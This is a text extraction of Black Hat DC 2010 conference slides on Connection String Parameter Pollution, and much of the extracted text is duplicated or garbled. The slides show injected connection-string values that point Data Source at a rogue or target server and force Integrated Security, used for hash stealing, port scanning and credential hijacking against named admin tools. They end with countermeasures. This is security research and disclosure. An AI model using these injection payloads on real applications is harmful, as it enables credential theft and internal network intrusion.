Blackhat DC 2010 Alonso Connection String Parameter Pollution Slides

p
Chema Alonso
Informática 64
Connection Strings
• Define
Define the
the way an application connects to
data repository
• There are connection
are connection strings for:
– Relational Databases (MSSQL, Oracle, MySQL,…)
– LDAP Directories
LDAP Di i
– Files
– Etc…
Databases Connection Strings
Data Source
Data Source = myServerAddress;
= myServerAddress;
Initial Catalog = myDataBase;
myDataBase;
User Id = myUsername;
Password = myPassword;
Google Hacking
Google Hacking
Google Hacking
Google Hacking
UDL (Universal Data Links) Files
UDL (Universal Data Links) Files
Credentials
Operating System Accounts Database Credentials
Data Source = Data Source =
myServerAddress; myServerAddress;
Initial Catalog = myDataBase; Initial Catalog = myDataBase;
User Id = myUsername; User Id = myUsername;
Password = myPassword; Password = myPassword;
Integrated Security = Integrated Security = No;
SSPI/True/Yes;
Users autheticated by Web App
Web application manages the login process
1.‐ Web applicaton
connects using its
Syslogins Connection string credentials to the
database.
2.‐ Asks user login

i f
information.
ti
Custom Select id from users
3.‐ Checks login
users table
information about info
stored in custom users
table.
Database Engine App running on Web Server

Users autheticated by Database
Database engine manages the login process
1.‐ Web application
asks for credentials.
2.‐ A connection
2 i string
i
is composed with the
Syslogins Connection string credentials to connect
to the database.
3.‐ Roles and permits
are limited by the user
used
sed in the
in the connection
string
Database Engine App running on Web Server

Connection String Attacks
• It´s
It s possible to inject parameters into connection
strings using semi colons as separators
Data Source = myServerAddress;
I iti l Catalog
Initial C t l = myDataBase;
D t B
Integrated Security = NO;
User Id = myUsername;
Password = myPassword; Encryption = Off;
ConnectionStringBuiler
• Available in .NET Framework 2.0
• Build secure connection strings using parameters
• It´s not possible to inject into the connection string
Are people aware of this?
Are people of this?
Connection String Parameter Pollution
• The goal is to inject parameters in the connection
e goa s to ject pa a ete s t e co ect o
string, whether they exist or not
• Had duplicated a parameter, the last value wins
• This behavior allows attackers to re‐write
completly the connection string, therefore to
manipulate the way the appliation will work and
how should be the it authenticated
Pollutionable Behavior
Param1=Value A Param2=Value B Param1=Value C Param2=Value D
DBConnection Object
Param1
Param2
What can be done with CSPP?
Rewrite a parameter
Data Source=DB1
Data Source=DB1 UID=sa password=Pwnd! Data Source=DB2
Data Source=DB2
DBConnection Object
DataSource
UID
password
Scanning the DMZ
Development Finnacial Test Forgotten

Database 1 Database Database Database
Data
Web app Source
I t
Internet
t Production
FW vulnerable
to CSPP Database
Port Scanning a Server
Port Scanning a Server
DataSource
DB1,80
DB1,21
Web app DB1,25
Internet vulnerable Production
FW to CSPP Database
DB1 1445
DB1,1445
Server
What can be done with CSPP?
Add a parameter
dd
Data Source=DB1
Data Source=DB1 UID=sa password=Pwnd! Integrated Security=True
DBConnection Object
DataSource
UID
password
CSPP Attack 1: Hash stealing
CSPP Attack 1: Hash stealing
1 ‐ Run a Rogue
1. a Rogue Server on
Server on an accessibl IP address:
IP address:
Rogue_Server
2 Activate a sniffer
2.‐ a sniffer to catch the
catch the login process
Cain/Wireshark
3.‐ Duplicate Data Source parameter
Data_Source=Rogue_Server
4.‐ Force Windows Integrated Authentication
Integrated
g Security=true
y
CSPP Attack 1: Robo de Hash
CSPP Attack 1: Robo de Hash
Data source
Data source = SQL2005; initial catalog
SQL2005; initial catalog = db1;
db1;
Integrated Security=no; user id=+’User_Value’+;
Password=+’Password
Password=+ Password_Value
Value’+;+;
Data source = SQL2005; initial catalog = db1;
D t SQL2005 i iti l t l db1
Integrated Security=no; user id= ;Data
S
Source=Rogue_Server;
R S
Password=;Integrated Security=True;
CSSP 1:ASP.NET Enterprise Manager
CSSP 1:ASP.NET Enterprise Manager
CSPP Attack 2: Port Scanning
1 ‐ Duplicate the Data Source
1. Data Source parameter setting
on it the Target server and target port to be
scanned.
scanned
Data_Source=Target_Server,target_Port
2 Check the error messages:
2.‐ error messages:
‐ No TCP Connection ‐> Port is opened
‐ No SQL Server ‐> Port is closed
‐ SQL Server ‐> Invalid Password
Data source
db1;
Value’+;+;
S
Source=Target_Server, Target_Port;
T t S T t P t
Password=;Integrated Security=True;
CSPP 2: myLittleAdmin
Port is Opened
Port is Opened
Port is Closed
Port is
CSPP Attack 3: Hijacking
CSPP Attack 3: Hijacking Web Credentials
Web Credentials
1 ‐ Duplicate Data Source
1. Data Source parameter to the
target SQL Server
Data Source=Target Server
Data_Source=Target_Server
2.‐ Force Windows Authentication
Integrated Security=true
3.‐ Application
pp pool in which the web app
p pp is
running on will send its credentials in order to
log in to
g the database engine.
g
CSPP Attack 3: Hijacking
CSPP Attack 3: Hijacking Web Credentials
Web Credentials
Data source
db1;
Value’+;+;
S
Source=Target_Server;
T t S
Password=;Integrated Security=true;
CSPP Attack 3: Web Data Administrator
CSPP Attack 3: Web Data Administrator
CSPP Attack 3:
myLittleAdmin/myLittleBackup
l d / l k
CSPP Attack 3: ASP.NET Enterprise Manager
CSPP Attack 3: ASP.NET Enterprise Manager
Other Databases
• MySQL
– Does not support Integrated security
– It´s possible to manipulate the behavior of the web application,
although
• Port Scanning
• Connect to internal/testing/for developing Databases
• Oracle supports integrated authority running on Windows
and UNIX/Linux servers
d UNIX/Li
– It´s possible to perform all described attacks
• Hash stealing
• Port Scanning
P tS i
• Hijacking Web credentials
– Also it´s possible to elevate a connection to sysdba in order to
shutdown/startup an instance
shutdown/startup an instance
myLittleAdmin/myLittleBackup
myLittleTools released a secury advisory and a patch about this

ASP.NET Enterprise Manager
• ASP.NET Enterprise Manager is “abandoned”, but it´s
been used in a lot of web Control Panels.
• Fix the code yourself
Fix the code yourself
• ASP.NET Enterprise Manager is “abandoned”, but it´s
been used in a lot of web Control Panels
been used in a lot of web Control Panels.
• Fix the code yourself
h lf
ASP.NET Web Data Admistrator
ASP.NET Web Data Admistrator
ASP Web Data Administrator is secure in CodePlex web site, but not in

Microsoft web site where is been published an unsecure old version
Countermeasures
• Harden
a de you
your firewall
e a
– Outbound connections
• Harden yyour internal accounts
– Web application
– Web server
– Database Engine
• Use ConnectionStringBuilder
• Filter the ;)
Questions?
Contacto
Chema Alonso
chema@informatica64.com
http://www.informatica64.com
http://elladodelmal.blogspot.com
Palako
palakko@lateatral.com
Authors
Chema Alonso
Manuel Fernández “The Sur”
Alejandro Martín Bailón
Antonio Guzmán

Blackhat DC 2010 Alonso Connection String Parameter Pollution Slides

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Blackhat DC 2010 Alonso Connection String Parameter Pollution Slides

Uploaded by

Copyright:

Available Formats

p

2.‐ Asks user login

Database Engine App running on Web Server

Database Engine App running on Web Server

Development Finnacial Test Forgotten

myLittleTools released a secury advisory and a patch about this

ASP Web Data Administrator is secure in CodePlex web site, but not in

You might also like